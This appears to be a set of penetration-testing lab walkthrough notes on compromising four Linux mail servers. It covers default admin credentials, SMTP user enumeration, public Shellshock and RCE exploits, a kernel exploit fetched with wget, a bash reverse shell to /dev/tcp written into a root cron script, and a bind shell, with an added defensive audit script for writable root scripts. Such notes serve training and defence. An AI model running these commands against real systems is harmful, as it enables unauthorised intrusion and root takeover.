Mail 1: Apache James

Target: Linux

Foothold: Misconfiguration

Admin CLI

nc $target 4555
Login id: root
Password: root


setpassword <user> <newpassword>

IMAP/POP3 Client

  • Access user mailbox
  • Find SSH credentials

Privilege Escalation: Kernel exploit

# Download memodipper.c to Kali
# Start python web server
# Download and compile on target
cd /tmp
wget http://$kaliIP/memodipper.c
gcc memodipper.c -o pwn
chmod +x pwn

Mail 2: Postfix

Target: Linux

Foothold: Misconfiguration & Postfix Shellshock

  • nmap scan shows local domain is mail.local
  • List SMB shares
smbclient -L //$target -U '' --option="client min protocol=core"
  • SMB allows anonymous login
  • SMB shares reveal user home directories and usernames
  • Connect to Postfix service
nc $target 25
VRFY admin@mail.local
  • Receive confirmation of user existence
  • Check searchsploit for Postfix version
searchsploit postfix

Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote C | linux/remote/
  • Google search for Postfix shellshock
  • Start listener
sudo nc -lnvp $tcpPort
  • Run the exploit
python2 $target admin@mail.local $kaliIP $tcpPort

Privilege Escalation: Cron job running as root

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/$kaliIP/$tcpPort 0>&1' >
  • Start a listener
  • Wait for cron to trigger the script

Mail 3: Apache James

Target: Linux

Foothold: RCE

  • Apache James version is vulnerable to RCE
  • Apache James Server 2.3.2 - Remote Command Execution | linux/remote/
  • Copy the exploit
  • Change the payload
  • Set the user and password to root:root
  • Run python2 $target
  • Start msfconsole and use exploit/multi/handler
set lhost <kali ip>
set lport <tcp port>

Privilege Escalation: File permissions

  • /etc/init.d/james is world-writable
  • Modify the start-up script with a new reverse shell
  • I am able to run sudo reboot
  • Start listener
  • Catch new shell
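
The cron escalation in Mail 2 and the init-script escalation in Mail 3 both depend on root executing a script that a non-root user can edit. The following is an added example (not part of the original notes) of a defender-side audit that lists such files; the default directory list is an assumption for Debian-style systems.

```shell
#!/bin/sh
# Added example: flag files in root-executed locations (init scripts,
# cron directories) that a non-root user could modify.
# Usage: audit_root_scripts [DIR...]
audit_root_scripts() {
    # Assumed defaults; pass explicit directories to override.
    [ "$#" -gt 0 ] || set -- /etc/init.d /etc/cron.d /etc/cron.hourly \
                             /etc/cron.daily /etc/cron.weekly
    for dir in "$@"; do
        [ -d "$dir" ] || continue

        # World-writable directory without the sticky bit: any user can
        # replace or rename the scripts inside it.
        find "$dir" -type d -perm -0002 ! -perm -1000 -print 2>/dev/null |
            sed 's/^/WORLD-WRITABLE-DIR /'

        # The Mail 3 condition: any local user can edit the script.
        find "$dir" -type f -perm -0002 -print 2>/dev/null |
            sed 's/^/WORLD-WRITABLE /'

        # Group-writable but not world-writable: review group membership.
        find "$dir" -type f -perm -0020 ! -perm -0002 -print 2>/dev/null |
            sed 's/^/GROUP-WRITABLE /'

        # Owned by someone other than root: the owner can edit it.
        find "$dir" -type f ! -user root -print 2>/dev/null |
            sed 's/^/NOT-ROOT-OWNED /'
    done
}

# Run against the given directories, or the assumed defaults if none.
audit_root_scripts "$@"
```

Any line of output is a file to fix with `chown root:root` and `chmod go-w` before a low-privilege account can use it.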

Mail 4: Sendmail + ClamAV Milter

Target: Linux

Foothold: RCE

  • Initial TCP port scan showed Sendmail and SNMP
  • UDP port scan revealed SNMP port
  • Ran all SNMP Nmap scripts against the UDP port
  • Found interesting process of ClamAV acting as Sendmail milter
  • Searchsploit for ClamAV and triangulated on Sendmail
  • Exploit DB ID:
  • Exploit opens a bind shell on 31337 on the target using ClamAV milter
  • Run the exploit
perl $target
  • Connect to the bind shell
nc -nv $target 31337

Privilege Escalation: Vulnerable service is running as root